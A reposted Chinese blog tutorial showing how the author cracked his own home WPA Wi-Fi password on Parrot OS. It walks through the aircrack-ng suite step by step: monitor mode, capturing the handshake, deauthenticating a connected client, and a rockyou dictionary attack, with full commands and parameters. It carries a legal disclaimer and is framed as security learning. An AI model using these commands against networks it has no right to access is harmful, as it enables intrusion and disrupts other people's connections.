1. 程式人生 > >【轉載】別人是怎麼破解你們家無線密碼的

【轉載】別人是怎麼破解你們家無線密碼的

今天想玩風暴英雄混個卡德加的頭像,結果一直連不上,一氣之下打開了之前安裝在硬盤裡的Parrot OS,準備日常更新下系統/軟體什麼的。結果發現搬了家之後還沒有在Parrot上用過這的WiFi,大半夜的也不好叫醒臨屋的妹子,正好Parrot是一個類似於Kali Linux的主要用於滲透測試的linux系統,所以就嘗試著破解了自己家的wifi。
百度了下工具,黑吧的一篇帖子裡這麼講挺不錯的,整理在這裡,Parrot和KALI都是DEBIAN的,大同小異。我把出問題的地方都找了資料更新在這(收藏,侵刪,編者是我)。

 Kali Linux能做很多事,但是它主要以滲透測試及’破解wifi密碼’聞名。(編者:Parrot也不錯,而且更炫酷)

要求:

  • 安裝有Kali Linux的計算機
  • 支援監控模式的網絡卡,膝上型電腦一般都支援
  • 字典檔案
  • 時間和耐心

這種攻擊需要字典檔案,一個好的字典至關重要。我以Kali Linux自帶的rockyou字典為例,位於/usr/share/wordlists/rockyou.txt.gz。

使用前先解壓:

# gzip -d /usr/share/wordlists/rockyou.txt.gz

(編者:建議用cp命令拷到你熟悉的路徑下再解壓,/tmp是個不錯的選擇)

注意:破解其他人的wifi密碼是“犯罪”,so,don’t;我使用自己的無線路由器演示。

知道了攻擊方法,你自然就知道怎麼防範了。

1)首先斷開連線的wifi。

在終端中執行:

# airmon-ng

破解wifi密碼

上面命令列出了支援監控模式的無線網絡卡。如果沒有任何輸出,表示無線網絡卡不支援監控模式。你可以看到我的wlan0支援監控模式。

2)開啟無線網絡卡的監控模式

# airmon-ng start wlan0

破解wifi密碼

執行成功之後網絡卡介面變為wlan0mon;可以使用ifconfig命令檢視。

3)檢視wifi網路

# airodump-ng wlan0mon

破解wifi密碼

上面列出了周圍的wifi和它們的詳細資訊,包括訊號強度、加密型別、頻道等。要記住要破解wifi的頻道號和BSSID。

按Ctrl-C結束。

4)抓取握手包

使用網絡卡的監聽模式抓取周圍的無線網路資料包。其中,對我們最重要的資料包是:包含密碼的包-也叫握手包。當有新使用者或斷開使用者自動連線wifi時,會發送握手包。

開始抓包:

# airodump-ng -c 6 --bssid C8:3A:35:30:3E:C8 -w ~/ wlan0mon

(編者:此處我手寫運行了這條命令後終端報了一個“Not interface specified”的錯誤,百度了另一篇帖子之後,在"-c 6 "之後加上了"wlan0mon"就可以了,現在回過頭來看,原來是誤會了作者的意思。最後的"wlan0mon"和“~/”之間是有空格的,並不是一個東西)

引數解釋:

  • -c指定頻道號
  • –bssid指定路由器bssid
  • -w指定抓取的資料包儲存位置
  • 最後要空格加上wlan0mon

破解wifi密碼

5)強制連線到wifi的裝置重新連線路由器

現在我們只要等使用者連線/重連線wifi了,運氣不好也許要很長時間。

但是我們是不會等的,這不是耐心黑客該乾的事。有一個叫aireplay-ng的工具,它可以強制使用者斷開wifi連線;原理是,給連線到wifi的一個裝置傳送一個deauth(反認證)包,讓那個裝置斷開wifi,隨後它自然會再次連線wifi。

aireplay-ng的生效前提是,wifi網路中至少有一個連線的裝置。從上圖(4)可以看到哪些裝置連線到了wifi,STATION就是連線裝置的MAC地址,記住一個。

開啟新終端執行:

# aireplay-ng -0 2 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon

引數解釋:

  • -0指定傳送反認證包的個數
  • -a指定無線路由器BSSID
  • -c指定強制斷開的裝置

破解wifi密碼

如果成功:

破解wifi密碼

按Ctrl-C結束抓包。

我們已經得到了想要的握手包了,可以結束無線網絡卡的監控模式了:

# airmon-ng stop wlan0mon

破解wifi密碼

6) 開始破解密碼

# aircrack-ng -a2 -b C8:3A:35:30:3E:C8 -w /usr/share/wordlists/rockyou.txt ~/*.cap

引數解釋:

  • -a2代表WPA的握手包
  • -b指定要破解的wifi BSSID。
  • -w指定字典檔案
  • 最後是抓取的包

破解wifi密碼

最後用黑8的一句話:內容來自於網際網路,僅適於網路安全技術愛好者學習研究使用,學習中請遵循國家相關法律法規,黑客不作惡,黑客維護網路安全